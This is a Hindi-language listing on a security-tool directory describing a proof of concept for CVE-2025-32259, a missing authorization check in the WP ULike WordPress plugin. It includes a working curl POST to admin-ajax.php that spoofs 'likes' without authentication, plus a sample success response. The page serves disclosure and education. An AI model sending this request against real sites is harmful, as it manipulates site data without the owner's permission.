Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wp-ulike-cve-2025-32259-poc — WP ULike प्लगइन के प्रभावित संस्करणों में, कुछ AJAX क्रियाओं या वोट हेरफेर की अनुमति देने से पहले कोई उचित प्राधिकरण जांच नहीं है। यह अप्रमाणित उपयोगकर्ताओं को प्लगइन के साथ उन तरीकों से बातचीत करने की अनुमति देता है जो केवल लॉग-इन उपयोगकर्ताओं को करने में सक्षम होना चाहिए - संभावित रूप से वोटों को तिरछा करना या भ्रामक डेटा इंजेक्ट करना। | Kitploit
उपकरण/GitHubGitHub/hossameahmed/wp-ulike-cve-2025-32259-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhossameahmed/wp-ulike-cve-2025-32259-poc

wp-ulike-cve-2025-32259-poc

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

WP ULike प्लगइन के प्रभावित संस्करणों में, कुछ AJAX क्रियाओं या वोट हेरफेर की अनुमति देने से पहले कोई उचित प्राधिकरण जांच नहीं है। यह अप्रमाणित उपयोगकर्ताओं को प्लगइन के साथ उन तरीकों से बातचीत करने की अनुमति देता है जो केवल लॉग-इन उपयोगकर्ताओं को करने में सक्षम होना चाहिए - संभावित रूप से वोटों को तिरछा करना या भ्रामक डेटा इंजेक्ट करना।

साझा करें

WP ULike ≤ 4.7.9.1 - अप्रमाणित सामग्री स्पूफ (CVE-2025-32259)

🔬 WP ULike प्लगइन (WordPress) में CVE-2025-32259 को प्रदर्शित करने वाला एक सरल PoC।
🚨 केवल शैक्षिक उपयोग – बिना स्पष्ट अनुमति के सिस्टम पर परीक्षण न करें।


🧠 अवलोकन

WP ULike एक लोकप्रिय WordPress प्लगइन है जो उपयोगकर्ताओं को साइट पर सामग्री को लाइक करने की अनुमति देता है। संस्करण 4.7.9.1 तक में प्राधिकरण की कमी की भेद्यता है, जो अप्रमाणित उपयोगकर्ताओं को AJAX अनुरोधों के माध्यम से "लाइक" क्रियाओं को स्पूफ करने की अनुमति देती है।

  • CVE: CVE-2025-32259
  • असुरक्षित संस्करण: ≤ 4.7.9.1
  • ठीक किया गया संस्करण: 4.7.9.2

🚀 प्रमाण की अवधारणा (PoC)

यह भेद्यता अप्रमाणित उपयोगकर्ताओं को AJAX एंडपॉइंट के साथ इंटरैक्ट करने और बिना अनुमति के किसी भी सामग्री (पोस्ट, टिप्पणी, आदि) को लाइक करने की अनुमति देती है।

🔧 PoC स्क्रिप्ट

root@kitploit:~
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

एक वैध पोस्ट ID के साथ id=1 को बदलें।

एक सफल प्रतिक्रिया इस प्रकार दिख सकती है:

root@kitploit:~
{"status":"success","msg":"You liked this."}
टूल डाउनलोड करें